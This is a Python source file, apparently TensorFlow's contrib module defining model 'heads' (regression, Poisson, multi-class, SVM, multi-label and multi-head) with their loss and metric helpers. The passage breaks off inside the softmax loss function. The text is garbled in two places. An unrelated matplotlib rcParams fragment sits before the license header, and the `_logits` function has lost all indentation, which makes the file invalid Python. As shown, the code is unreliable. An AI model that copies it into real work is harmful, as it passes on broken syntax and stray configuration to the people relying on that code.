    'xtick.major.width': 2,
    'ytick.major.width': 2,
    'grid.linewidth': 1.5,
    # 'legend.frameon': False,
}
matplotlib.rcParams.update(_RC_OVERRIDES)
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Abstractions for the head(s) of a model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.contrib import framework as framework_lib
from tensorflow.contrib import layers as layers_lib
from tensorflow.contrib import lookup as lookup_lib
# TODO(ptucker): Use tf.losses and tf.metrics.
from tensorflow.contrib import losses as losses_lib
from tensorflow.contrib import metrics as metrics_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators.metric_key import MetricKey as mkey
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import training
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
class Head(object):
  """Interface for the head/top of a model.

  Given logits (or output of a hidden layer), a Head knows how to compute
  predictions, loss, default metric and export signature. It is meant to,

  1) Simplify writing model_fn and to make model_fn more configurable.
  2) Support wide range of machine learning models. Since most heads can work
     with logits, they can support DNN, RNN, Wide, Wide&Deep,
     Global objectives, Gradient boosted trees and many other types
     of machine learning models.
  3) To allow users to seamlessly switch between 1 to n heads for multi
     objective learning (See _MultiHead implementation for more details).

  Common usage:
  Here is simplified model_fn to build a multiclass DNN model.
    ```python
    def _my_dnn_model_fn(features, labels, mode, params, config=None):
      # Optionally your callers can pass head to model_fn as a param.
      head = tf.contrib.learn.multi_class_head(...)
      input = tf.contrib.layers.input_from_feature_columns(features, ...)
      last_hidden_layer_out = tf.contrib.layers.stack(
          input, tf.contrib.layers.fully_connected, [1000, 500])
      logits = tf.contrib.layers.fully_connected(
          last_hidden_layer_out, head.logits_dimension, activation_fn=None)

      def _train_op_fn(loss):
        return optimizer.minimize(loss)

      return head.create_model_fn_ops(
          features=features,
          labels=labels,
          mode=mode,
          train_op_fn=_train_op_fn,
          logits=logits,
          scope=...)
    ```

  Most heads also support logits_input which is typically the output of the
  last hidden layer. Some heads (like heads responsible for candidate sampling
  or hierarchical softmax) intrinsically will not support logits and you have
  to pass logits_input. Here is a common usage,
    ```python
    return head.create_model_fn_ops(
        features=features,
        labels=labels,
        mode=mode,
        train_op_fn=_train_op_fn,
        logits_input=last_hidden_layer_out,
        scope=...)
    ```

  There are cases where computing and applying gradients can not be
  meaningfully captured with train_op_fn we support (for example, with sync
  optimizer). In such case, you can take the responsibility on your own. Here
  is a common use case,
    ```python
    model_fn_ops = head.create_model_fn_ops(
        features=features,
        labels=labels,
        mode=mode,
        train_op_fn=tf.contrib.learn.no_op_train_fn,
        logits=logits,
        scope=...)
    if mode == tf.contrib.learn.ModeKeys.TRAIN:
      optimizer = ...
      sync = tf.train.SyncReplicasOptimizer(opt=optimizer, ...)
      update_op = tf.contrib.layers.optimize_loss(optimizer=sync,
                                                  loss=model_fn_ops.loss, ...)
      hooks = [sync.make_session_run_hook(is_chief)]
      ... update train_op and hooks in ModelFnOps and return
    ```
  """

  # NOTE(review): `__metaclass__` is the Python 2 spelling; Python 3 ignores
  # this attribute, so abstract-method enforcement only applies under Py2.
  __metaclass__ = abc.ABCMeta

  @abc.abstractproperty
  def logits_dimension(self):
    """Size of the last dimension of the logits `Tensor`.

    Typically, logits is of shape `[batch_size, logits_dimension]`.

    Returns:
      The expected size of the `logits` tensor.
    """
    raise NotImplementedError("Calling an abstract method.")

  @abc.abstractmethod
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """Returns `ModelFnOps` that a model_fn can return.

    Please note that,
    + Exactly one of `logits` and `logits_input` must be provided.
    + All args must be passed via name.

    Args:
      features: Input `dict` of `Tensor` objects.
      mode: Estimator's `ModeKeys`.
      labels: Labels `Tensor`, or `dict` of same.
      train_op_fn: Function that takes a scalar loss `Tensor` and returns an op
        to optimize the model with the loss. This is used in TRAIN mode and
        must not be None. None is allowed in other modes. If you want to
        optimize loss yourself you can pass `no_op_train_fn` and then use
        ModeFnOps.loss to compute and apply gradients.
      logits: logits `Tensor` to be used by the head.
      logits_input: `Tensor` from which to build logits, often needed when you
        don't want to compute the logits. Typically this is the activation of
        the last hidden layer in a DNN. Some heads (like the ones responsible
        for candidate sampling) intrinsically avoid computing full logits and
        only accepts logits_input.
      scope: Optional scope for `variable_scope`.

    Returns:
      An instance of `ModelFnOps`.

    Raises:
      ValueError: If `mode` is not recognized.
      ValueError: If neither or both of `logits` and `logits_input` is
        provided.
    """
    raise NotImplementedError("Calling an abstract method.")
def regression_head(label_name=None,
                    weight_column_name=None,
                    label_dimension=1,
                    enable_centered_bias=False,
                    head_name=None):
  """Creates a `Head` for linear regression.

  The returned head pairs a mean-squared-error loss with the identity link
  function.

  Args:
    label_name: Optional key of the label in the labels dict; may be None for
      single-headed models where labels is a plain tensor.
    weight_column_name: Optional feature name holding per-example weights that
      multiply the loss (down-weighting or boosting examples).
    label_dimension: Number of regression labels per example, i.e. the size of
      the last dimension of the labels `Tensor` (typically shaped
      `[batch_size, label_dimension]`).
    enable_centered_bias: If True, a centered bias variable is learned per
      class and the rest of the model fits the residual.
    head_name: Optional head name; prediction/summary/metric keys are suffixed
      with `"/" + head_name` and it names the default variable scope.

  Returns:
    An instance of `Head` for linear regression.
  """
  common_kwargs = dict(
      label_name=label_name,
      weight_column_name=weight_column_name,
      label_dimension=label_dimension,
      enable_centered_bias=enable_centered_bias,
      head_name=head_name)
  # Identity link + squared error = ordinary linear regression.
  return _RegressionHead(
      loss_fn=_mean_squared_loss,
      link_fn=array_ops.identity,
      **common_kwargs)
def poisson_regression_head(label_name=None,
                            weight_column_name=None,
                            label_dimension=1,
                            enable_centered_bias=False,
                            head_name=None):
  """Creates a `Head` for poisson regression.

  The returned head pairs a Poisson log loss with an exponential link
  function.

  Args:
    label_name: Optional key of the label in the labels dict; may be None for
      single-headed models where labels is a plain tensor.
    weight_column_name: Optional feature name holding per-example weights that
      multiply the loss (down-weighting or boosting examples).
    label_dimension: Number of regression labels per example, i.e. the size of
      the last dimension of the labels `Tensor` (typically shaped
      `[batch_size, label_dimension]`).
    enable_centered_bias: If True, a centered bias variable is learned per
      class and the rest of the model fits the residual.
    head_name: Optional head name; prediction/summary/metric keys are suffixed
      with `"/" + head_name` and it names the default variable scope.

  Returns:
    An instance of `Head` for poisson regression.
  """
  common_kwargs = dict(
      label_name=label_name,
      weight_column_name=weight_column_name,
      label_dimension=label_dimension,
      enable_centered_bias=enable_centered_bias,
      head_name=head_name)
  # exp link inverts the log link of the Poisson GLM.
  return _RegressionHead(
      loss_fn=_poisson_loss,
      link_fn=math_ops.exp,
      **common_kwargs)
# TODO(zakaria): Consider adding a _RegressionHead for logistic_regression
def multi_class_head(n_classes,
                     label_name=None,
                     weight_column_name=None,
                     enable_centered_bias=False,
                     head_name=None,
                     thresholds=None,
                     metric_class_ids=None,
                     loss_fn=None,
                     label_keys=None):
  """Creates a `Head` for multi class single label classification.

  The Head uses softmax cross entropy loss. It expects integer class-index
  labels unless `label_keys` is given, in which case labels (and predicted
  classes) are strings from that vocabulary.

  Args:
    n_classes: Integer number of classes; must be >= 2. With exactly 2 classes
      a binary logistic head is returned instead of a multi-class head.
    label_name: Optional key of the label in the labels dict; may be None for
      single-headed models where labels is a plain tensor.
    weight_column_name: Optional feature name holding per-example weights that
      multiply the loss.
    enable_centered_bias: If True, a centered bias variable is learned per
      class and the rest of the model fits the residual.
    head_name: Optional head name; prediction/summary/metric keys are suffixed
      with `"/" + head_name` and it names the default variable scope.
    thresholds: Thresholds for eval metrics; defaults to [.5].
    metric_class_ids: Class IDs to report per-class metrics for; each must lie
      in `[0, n_classes)`. Invalid when `n_classes` is 2.
    loss_fn: Optional callable `(labels, logits, weights)` returning a
      weighted scalar loss; `weights` should be optional. See `tf.losses`.
    label_keys: Optional list of `n_classes` label strings. Only supported
      when `n_classes` > 2.

  Returns:
    An instance of `Head` for multi class classification.

  Raises:
    ValueError: If `n_classes` is < 2, if `metric_class_ids` or `label_keys`
      is provided when `n_classes` is 2, or if `loss_fn` has an unexpected
      signature.
  """
  if n_classes is None or n_classes < 2:
    raise ValueError("n_classes must be > 1 for classification: %s." %
                     n_classes)
  wrapped_loss_fn = None
  if loss_fn:
    _verify_loss_fn_args(loss_fn)
    wrapped_loss_fn = _wrap_custom_loss_fn(loss_fn)
  if n_classes > 2:
    return _MultiClassHead(
        n_classes=n_classes,
        label_name=label_name,
        weight_column_name=weight_column_name,
        enable_centered_bias=enable_centered_bias,
        head_name=head_name,
        thresholds=thresholds,
        metric_class_ids=metric_class_ids,
        loss_fn=wrapped_loss_fn,
        label_keys=label_keys)
  # Binary case: delegate to the logistic head, which supports neither
  # per-class metrics nor a label vocabulary.
  if metric_class_ids:
    raise ValueError("metric_class_ids invalid for n_classes==2.")
  if label_keys:
    raise ValueError("label_keys is not supported for n_classes=2.")
  return _BinaryLogisticHead(
      label_name=label_name,
      weight_column_name=weight_column_name,
      enable_centered_bias=enable_centered_bias,
      head_name=head_name,
      thresholds=thresholds,
      loss_fn=wrapped_loss_fn)
def binary_svm_head(
    label_name=None,
    weight_column_name=None,
    enable_centered_bias=False,
    head_name=None,
    thresholds=None,):
  """Creates a `Head` for binary classification with SVMs.

  The head uses binary hinge loss.

  Args:
    label_name: Optional key of the label in the labels dict; may be None for
      single-headed models where labels is a plain tensor.
    weight_column_name: Optional feature name holding per-example weights that
      multiply the loss.
    enable_centered_bias: If True, a centered bias variable is learned per
      class and the rest of the model fits the residual.
    head_name: Optional head name; prediction/summary/metric keys are suffixed
      with `"/" + head_name` and it names the default variable scope.
    thresholds: Thresholds for eval metrics; defaults to [.5].

  Returns:
    An instance of `Head` for binary classification with SVM.
  """
  svm_kwargs = dict(
      label_name=label_name,
      weight_column_name=weight_column_name,
      enable_centered_bias=enable_centered_bias,
      head_name=head_name,
      thresholds=thresholds)
  return _BinarySvmHead(**svm_kwargs)
def multi_label_head(n_classes,
                     label_name=None,
                     weight_column_name=None,
                     enable_centered_bias=False,
                     head_name=None,
                     thresholds=None,
                     metric_class_ids=None,
                     loss_fn=None):
  """Creates a Head for multi label classification.

  The Head uses sigmoid cross entropy loss, so each example may belong to
  several of the `n_classes` classes at once.

  Args:
    n_classes: Integer number of classes; must be >= 2.
    label_name: Optional key of the label in the labels dict; may be None for
      single-headed models where labels is a plain tensor.
    weight_column_name: Optional feature name holding per-example weights that
      multiply the loss.
    enable_centered_bias: If True, a centered bias variable is learned per
      class and the rest of the model fits the residual.
    head_name: Optional head name; prediction/summary/metric keys are suffixed
      with `"/" + head_name` and it names the default variable scope.
    thresholds: Thresholds for eval metrics; defaults to [.5].
    metric_class_ids: Class IDs to report per-class metrics for; each must lie
      in `[0, n_classes)`.
    loss_fn: Optional callable `(labels, logits, weights)` returning a
      weighted scalar loss; `weights` should be optional. See `tf.losses`.

  Returns:
    An instance of `Head` for multi label classification.

  Raises:
    ValueError: If `n_classes` is < 2, or `loss_fn` has an unexpected
      signature.
  """
  if n_classes < 2:
    raise ValueError("n_classes must be > 1 for classification.")
  wrapped_loss_fn = None
  if loss_fn:
    _verify_loss_fn_args(loss_fn)
    wrapped_loss_fn = _wrap_custom_loss_fn(loss_fn)
  return _MultiLabelHead(
      n_classes=n_classes,
      label_name=label_name,
      weight_column_name=weight_column_name,
      enable_centered_bias=enable_centered_bias,
      head_name=head_name,
      thresholds=thresholds,
      metric_class_ids=metric_class_ids,
      loss_fn=wrapped_loss_fn)
def multi_head(heads, loss_weights=None):
  """Creates a MultiHead stemming from same logits/hidden layer.

  Args:
    heads: List of `Head` objects.
    loss_weights: Optional list of weights, one per head, used when merging
      the per-head losses. Without it all losses are summed unweighted.

  Returns:
    An instance of `Head` that merges multiple heads.

  Raises:
    ValueError: If `heads` and `loss_weights` have different sizes.
  """
  if loss_weights and len(loss_weights) != len(heads):
    raise ValueError("heads and loss_weights must have same size")

  def _weighted_loss_merger(losses):
    # With no weights configured, merging is a plain sum.
    if not loss_weights:
      return math_ops.add_n(losses)
    if len(losses) != len(loss_weights):
      raise ValueError("losses and loss_weights must have same size")
    scaled = [math_ops.multiply(loss, weight)
              for loss, weight in zip(losses, loss_weights)]
    return math_ops.add_n(scaled)

  return _MultiHead(heads, loss_merger=_weighted_loss_merger)
def no_op_train_fn(loss):
  """Returns a no-op train op; use when the caller applies gradients itself."""
  del loss  # Deliberately ignored.
  return control_flow_ops.no_op()
class _SingleHead(Head):
  """Interface for a single head/top of a model."""

  __metaclass__ = abc.ABCMeta

  def __init__(
      self, problem_type, logits_dimension, label_name=None,
      weight_column_name=None, head_name=None):
    """Validates and stores the configuration shared by all single heads."""
    if problem_type is None:
      raise ValueError("Invalid problem_type %s." % problem_type)
    if logits_dimension is None or logits_dimension < 1:
      raise ValueError("Invalid logits_dimension %s." % logits_dimension)
    self._head_name = head_name
    self._label_name = label_name
    self._weight_column_name = weight_column_name
    self._problem_type = problem_type
    self._logits_dimension = logits_dimension

  @property
  def logits_dimension(self):
    """Size of the last dimension of the logits this head consumes."""
    return self._logits_dimension

  @property
  def label_name(self):
    """Key of this head's label in the labels dict (may be None)."""
    return self._label_name

  @property
  def weight_column_name(self):
    """Feature name of the example-weight column (may be None)."""
    return self._weight_column_name

  @property
  def head_name(self):
    """Name of this head (may be None)."""
    return self._head_name

  def _create_output_alternatives(self, predictions):
    """Wraps `predictions` into this head's output-alternatives dict.

    Args:
      predictions: a dict of {tensor_name: Tensor}, where 'tensor_name' is a
        symbolic output name (possibly from `PredictionKey`) and 'Tensor' is
        the corresponding output tensor.

    Returns:
      A single-entry `dict` {head_name: (problem_type, predictions)}, where
      'head_name' identifies this submodel consistently across the pipeline
      and 'problem_type' is a `ProblemType`.
    """
    return {self._head_name: (self._problem_type, predictions)}
# TODO(zakaria): use contrib losses.
def _mean_squared_loss(labels, logits, weights=None):
  """Per-example squared error between `logits` and `labels`, then weighted."""
  with ops.name_scope(None, "mean_squared_loss", (logits, labels)) as name:
    logits = ops.convert_to_tensor(logits)
    labels = ops.convert_to_tensor(labels)
    # Promote rank-1 tensors to rank-2 so the subtraction below cannot
    # broadcast across the batch dimension.
    labels = (array_ops.expand_dims(labels, dim=(1,))
              if len(labels.get_shape()) == 1 else labels)
    logits = (array_ops.expand_dims(logits, dim=(1,))
              if len(logits.get_shape()) == 1 else logits)
    logits.get_shape().assert_is_compatible_with(labels.get_shape())
    residual = logits - math_ops.to_float(labels)
    return _compute_weighted_loss(math_ops.square(residual, name=name), weights)
def _poisson_loss(labels, logits, weights=None):
  """Per-example Poisson log loss of `logits` against `labels`, then weighted."""
  with ops.name_scope(None, "_poisson_loss", (logits, labels)) as name:
    logits = ops.convert_to_tensor(logits)
    labels = ops.convert_to_tensor(labels)
    # Promote rank-1 tensors to rank-2 so shapes compare elementwise without
    # broadcasting.
    labels = (array_ops.expand_dims(labels, dim=(1,))
              if len(labels.get_shape()) == 1 else labels)
    logits = (array_ops.expand_dims(logits, dim=(1,))
              if len(logits.get_shape()) == 1 else logits)
    logits.get_shape().assert_is_compatible_with(labels.get_shape())
    loss = nn.log_poisson_loss(
        labels, logits, compute_full_loss=True, name=name)
    return _compute_weighted_loss(loss, weights)
def _logits(logits_input, logits, logits_dimension):
"""Validate logits args, and create `logits` if necessary.
Exactly one of `logits_input` and `logits` must be provided.
Args:
logits_input: `Tensor` input to `logits`.
logits: `Tensor` output.
logits_dimension: Integer, last dimension of `logits`. This is used to
create `logits` from `logits_input` if `logits` is `None`; otherwise, it's
used to validate `logits`.
Returns:
`logits` `Tensor`.
Raises:
ValueError: if neither or both of `logits` and `logits_input` are supplied.
"""
if (logits_dimension is None) or (logits_dimension < 1):
raise ValueError("Invalid logits_dimension %s." % logits_dimension)
# If not provided, create logits.
if logits is None:
if logits_input is None:
raise ValueError("Neither logits nor logits_input supplied.")
return layers_lib.linear(logits_input, logits_dimension, scope="logits")
if logits_input is not None:
raise ValueError("Both logits and logits_input supplied.")
logits = ops.convert_to_tensor(logits, name="logits")
logits_dims = logits.get_shape().dims
if logits_dims is not None:
logits_dims[-1].assert_is_compatible_with(logits_dimension)
return logits
def _create_model_fn_ops(features,
                         mode,
                         loss_fn,
                         logits_to_predictions_fn,
                         metrics_fn,
                         create_output_alternatives_fn,
                         labels=None,
                         train_op_fn=None,
                         logits=None,
                         logits_dimension=None,
                         head_name=None,
                         weight_column_name=None,
                         enable_centered_bias=False):
  """Returns a `ModelFnOps` object assembled from head-specific callbacks.

  Shared implementation behind the concrete heads: applies the optional
  centered bias to the logits, converts logits to predictions, and (outside
  INFER mode) computes loss, eval metrics and, in TRAIN mode, the train op.

  Args:
    features: Input `dict` of `Tensor` objects.
    mode: Estimator's `ModeKeys`.
    loss_fn: Callable taking `(labels, logits, weight_tensor)` and returning
      the pair `(loss, weighted_average_loss)` (see unpacking below).
    logits_to_predictions_fn: Callable mapping the (possibly biased) logits to
      the head's predictions dict.
    metrics_fn: Callable taking `(weighted_average_loss, predictions, labels,
      weight_tensor)` and returning eval metric ops.
    create_output_alternatives_fn: Callable mapping predictions to the
      output-alternatives dict used for export.
    labels: Labels `Tensor`, or `dict` of same; may be None in INFER mode.
    train_op_fn: Function mapping a scalar loss `Tensor` to a train op;
      required in TRAIN mode.
    logits: logits `Tensor` produced by the model.
    logits_dimension: Last dimension of `logits`; sizes the centered bias.
    head_name: Name of the head; used to key summaries and variables.
    weight_column_name: Feature name of the example-weight column, if any.
    enable_centered_bias: If True, adds a learned centered bias to `logits`.

  Returns:
    An instance of `model_fn.ModelFnOps`.

  Raises:
    ValueError: If `mode` is invalid, or `train_op_fn` is None in TRAIN mode.
  """
  _check_mode_valid(mode)
  centered_bias = None
  if enable_centered_bias:
    centered_bias = _centered_bias(logits_dimension, head_name)
    logits = nn.bias_add(logits, centered_bias)
  predictions = logits_to_predictions_fn(logits)
  loss = None
  train_op = None
  eval_metric_ops = None
  # INFER mode (or absent labels) yields predictions only: no loss, no
  # train op, no metrics.
  if (mode != model_fn.ModeKeys.INFER) and (labels is not None):
    weight_tensor = _weight_tensor(features, weight_column_name)
    loss, weighted_average_loss = loss_fn(labels, logits, weight_tensor)
    # Uses the deprecated API to set the tag explicitly.
    # Without it, training and eval losses will show up in different graphs.
    logging_ops.scalar_summary(
        _summary_key(head_name, mkey.LOSS), weighted_average_loss)
    if mode == model_fn.ModeKeys.TRAIN:
      if train_op_fn is None:
        raise ValueError("train_op_fn can not be None in TRAIN mode")
      batch_size = array_ops.shape(logits)[0]
      train_op = _train_op(loss, labels, train_op_fn, centered_bias,
                           batch_size, loss_fn, weight_tensor)
    eval_metric_ops = metrics_fn(
        weighted_average_loss, predictions, labels, weight_tensor)
  return model_fn.ModelFnOps(
      mode=mode,
      predictions=predictions,
      loss=loss,
      train_op=train_op,
      eval_metric_ops=eval_metric_ops,
      output_alternatives=create_output_alternatives_fn(predictions))
class _RegressionHead(_SingleHead):
  """`Head` for regression with a generalized linear model."""
  def __init__(self,
               label_dimension,
               loss_fn,
               link_fn,
               label_name=None,
               weight_column_name=None,
               enable_centered_bias=False,
               head_name=None):
    """`Head` for regression.

    Args:
      label_dimension: Number of regression labels per example. This is the
        size of the last dimension of the labels `Tensor` (typically, this has
        shape `[batch_size, label_dimension]`).
      loss_fn: Loss function, takes logits and labels and returns loss.
      link_fn: Link function, takes a logits tensor and returns the output.
      label_name: String, name of the key in label dict. Can be null if label
        is a tensor (single headed models).
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      enable_centered_bias: A bool. If True, estimator will learn a centered
        bias variable for each class. Rest of the model structure learns the
        residual after centered bias.
      head_name: name of the head. Predictions, summary and metrics keys are
        suffixed by `"/" + head_name` and the default variable scope is
        `head_name`.
    """
    super(_RegressionHead, self).__init__(
        problem_type=constants.ProblemType.LINEAR_REGRESSION,
        logits_dimension=label_dimension,
        label_name=label_name,
        weight_column_name=weight_column_name,
        head_name=head_name)
    self._loss_fn = loss_fn
    self._link_fn = link_fn
    self._enable_centered_bias = enable_centered_bias
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """See `Head`."""
    with variable_scope.variable_scope(
        scope,
        default_name=self.head_name or "regression_head",
        values=(tuple(six.itervalues(features)) +
                (labels, logits, logits_input))):
      labels = self._transform_labels(mode=mode, labels=labels)
      logits = _logits(logits_input, logits, self.logits_dimension)
      return _create_model_fn_ops(
          features=features,
          mode=mode,
          loss_fn=self._loss_fn,
          logits_to_predictions_fn=self._logits_to_predictions,
          metrics_fn=self._metrics,
          create_output_alternatives_fn=self._create_output_alternatives,
          labels=labels,
          train_op_fn=train_op_fn,
          logits=logits,
          logits_dimension=self.logits_dimension,
          head_name=self.head_name,
          weight_column_name=self.weight_column_name,
          enable_centered_bias=self._enable_centered_bias)
  def _transform_labels(self, mode, labels):
    """Applies transformations to labels tensor."""
    # No labels in INFER mode; regression labels must be dense.
    if (mode == model_fn.ModeKeys.INFER) or (labels is None):
      return None
    labels_tensor = _to_labels_tensor(labels, self._label_name)
    _check_no_sparse_tensor(labels_tensor)
    return labels_tensor
  def _logits_to_predictions(self, logits):
    """Returns a dict of predictions.

    Args:
      logits: logits `Tensor` after applying possible centered bias.

    Returns:
      Dict of prediction `Tensor` keyed by `PredictionKey`.
    """
    key = prediction_key.PredictionKey.SCORES
    with ops.name_scope(None, "predictions", (logits,)):
      if self.logits_dimension == 1:
        # Squeeze [batch_size, 1] logits to [batch_size] before linking.
        logits = array_ops.squeeze(logits, squeeze_dims=(1,), name=key)
      return {key: self._link_fn(logits)}
  def _metrics(self, eval_loss, predictions, labels, weights):
    """Returns a dict of metrics keyed by name."""
    del predictions, labels, weights  # Unused by this head.
    with ops.name_scope("metrics", values=[eval_loss]):
      return {
          _summary_key(self.head_name, mkey.LOSS):
              metrics_lib.streaming_mean(eval_loss)}
def _log_loss_with_two_classes(labels, logits, weights=None):
  """Sigmoid cross-entropy (log) loss for binary classification.

  Args:
    labels: Labels `Tensor`, castable to float; shape `[batch_size]` or
      `[batch_size, 1]`.
    logits: Logits `Tensor`.
    weights: Optional weights `Tensor`.

  Returns:
    A `(training_loss, reported_loss)` tuple from `_compute_weighted_loss`.
  """
  with ops.name_scope(None, "log_loss_with_two_classes",
                      (logits, labels)) as name:
    logits = ops.convert_to_tensor(logits)
    labels = math_ops.to_float(labels)
    # TODO(ptucker): This will break for dynamic shapes.
    # sigmoid_cross_entropy_with_logits requires [batch_size, 1] labels.
    if len(labels.get_shape()) == 1:
      labels = array_ops.expand_dims(labels, dim=(1,))
    loss = nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits,
                                                name=name)
  return _compute_weighted_loss(loss, weights)
def _one_class_to_two_class_logits(logits):
  """Expands single-column binary logits into two-class logits.

  The implicit negative-class logit is a column of zeros, so a softmax over
  the result matches a sigmoid over the input column.
  """
  negative_class_logits = array_ops.zeros_like(logits)
  return array_ops.concat((negative_class_logits, logits), 1)
class _BinaryLogisticHead(_SingleHead):
  """`Head` for binary classification with logistic regression."""
  def __init__(self,
               label_name=None,
               weight_column_name=None,
               enable_centered_bias=False,
               head_name=None,
               loss_fn=None,
               thresholds=None):
    """`Head` for binary classification with logistic regression.

    Args:
      label_name: String, name of the key in label dict. Can be `None` if label
        is a tensor (single headed models).
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      enable_centered_bias: A bool. If True, estimator will learn a centered
        bias variable for each class. Rest of the model structure learns the
        residual after centered bias.
      head_name: name of the head. Predictions, summary, metrics keys are
        suffixed by `"/" + head_name` and the default variable scope is
        `head_name`.
      loss_fn: Loss function.
      thresholds: thresholds for eval.

    Raises:
      ValueError: if n_classes is invalid.
    """
    super(_BinaryLogisticHead, self).__init__(
        problem_type=constants.ProblemType.LOGISTIC_REGRESSION,
        logits_dimension=1,
        label_name=label_name,
        weight_column_name=weight_column_name,
        head_name=head_name)
    # Defaults: 0.5 decision threshold, sigmoid cross-entropy loss.
    self._thresholds = thresholds if thresholds else (.5,)
    self._loss_fn = loss_fn if loss_fn else _log_loss_with_two_classes
    self._enable_centered_bias = enable_centered_bias
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """See `Head`."""
    with variable_scope.variable_scope(
        scope,
        default_name=self.head_name or "binary_logistic_head",
        values=(tuple(six.itervalues(features)) +
                (labels, logits, logits_input))):
      labels = self._transform_labels(mode=mode, labels=labels)
      logits = _logits(logits_input, logits, self.logits_dimension)
      return _create_model_fn_ops(
          features=features,
          mode=mode,
          loss_fn=self._loss_fn,
          logits_to_predictions_fn=self._logits_to_predictions,
          metrics_fn=self._metrics,
          create_output_alternatives_fn=_classification_output_alternatives(
              self.head_name, self._problem_type),
          labels=labels,
          train_op_fn=train_op_fn,
          logits=logits,
          logits_dimension=self.logits_dimension,
          head_name=self.head_name,
          weight_column_name=self.weight_column_name,
          enable_centered_bias=self._enable_centered_bias)
  def _transform_labels(self, mode, labels):
    """Applies transformations to labels tensor."""
    # No labels in INFER mode; binary labels must be dense.
    if (mode == model_fn.ModeKeys.INFER) or (labels is None):
      return None
    labels_tensor = _to_labels_tensor(labels, self._label_name)
    _check_no_sparse_tensor(labels_tensor)
    return labels_tensor
  def _logits_to_predictions(self, logits):
    """Returns a dict of predictions.

    Args:
      logits: logits `Output` after applying possible centered bias.

    Returns:
      Dict of prediction `Output` keyed by `PredictionKey`.
    """
    with ops.name_scope(None, "predictions", (logits,)):
      # Prepend an all-zeros negative-class column so argmax/softmax work.
      two_class_logits = _one_class_to_two_class_logits(logits)
      return {
          prediction_key.PredictionKey.LOGITS:
              logits,
          prediction_key.PredictionKey.LOGISTIC:
              math_ops.sigmoid(
                  logits, name=prediction_key.PredictionKey.LOGISTIC),
          prediction_key.PredictionKey.PROBABILITIES:
              nn.softmax(
                  two_class_logits,
                  name=prediction_key.PredictionKey.PROBABILITIES),
          prediction_key.PredictionKey.CLASSES:
              math_ops.argmax(
                  two_class_logits,
                  1,
                  name=prediction_key.PredictionKey.CLASSES)
      }
  def _metrics(self, eval_loss, predictions, labels, weights):
    """Returns a dict of metrics keyed by name."""
    with ops.name_scope("metrics", values=(
        [eval_loss, labels, weights] + list(six.itervalues(predictions)))):
      classes = predictions[prediction_key.PredictionKey.CLASSES]
      logistic = predictions[prediction_key.PredictionKey.LOGISTIC]
      metrics = {_summary_key(self.head_name, mkey.LOSS):
                 metrics_lib.streaming_mean(eval_loss)}
      # TODO(b/29366811): This currently results in both an "accuracy" and an
      # "accuracy/threshold_0.500000_mean" metric for binary classification.
      metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
          metrics_lib.streaming_accuracy(classes, labels, weights))
      metrics[_summary_key(self.head_name, mkey.PREDICTION_MEAN)] = (
          _predictions_streaming_mean(logistic, weights))
      metrics[_summary_key(self.head_name, mkey.LABEL_MEAN)] = (
          _indicator_labels_streaming_mean(labels, weights))
      # Also include the streaming mean of the label as an accuracy baseline, as
      # a reminder to users.
      metrics[_summary_key(self.head_name, mkey.ACCURACY_BASELINE)] = (
          _indicator_labels_streaming_mean(labels, weights))
      metrics[_summary_key(self.head_name, mkey.AUC)] = (
          _streaming_auc(logistic, labels, weights))
      metrics[_summary_key(self.head_name, mkey.AUC_PR)] = (
          _streaming_auc(logistic, labels, weights, curve="PR"))
      # Per-threshold accuracy/precision/recall for every eval threshold.
      for threshold in self._thresholds:
        metrics[_summary_key(
            self.head_name, mkey.ACCURACY_MEAN % threshold)] = (
                _streaming_accuracy_at_threshold(logistic, labels, weights,
                                                 threshold))
        # Precision for positive examples.
        metrics[_summary_key(
            self.head_name, mkey.PRECISION_MEAN % threshold)] = (
                _streaming_precision_at_threshold(logistic, labels, weights,
                                                  threshold))
        # Recall for positive examples.
        metrics[_summary_key(
            self.head_name, mkey.RECALL_MEAN % threshold)] = (
                _streaming_recall_at_threshold(logistic, labels, weights,
                                               threshold))
      return metrics
def _softmax_cross_entropy_loss(labels, logits, weights=None):
  """Sparse softmax cross-entropy loss for multi-class classification.

  Args:
    labels: Integer labels `Tensor`, shape `[batch_size]` or
      `[batch_size, 1]`.
    logits: Logits `Tensor`, shape `[batch_size, n_classes]`.
    weights: Optional weights `Tensor`.

  Returns:
    A `(training_loss, reported_loss)` tuple from `_compute_weighted_loss`.

  Raises:
    ValueError: If `labels` dtype is not integer.
  """
  with ops.name_scope(
      None, "softmax_cross_entropy_loss", (logits, labels,)) as name:
    labels = ops.convert_to_tensor(labels)
    # Check that we got integer for classification.
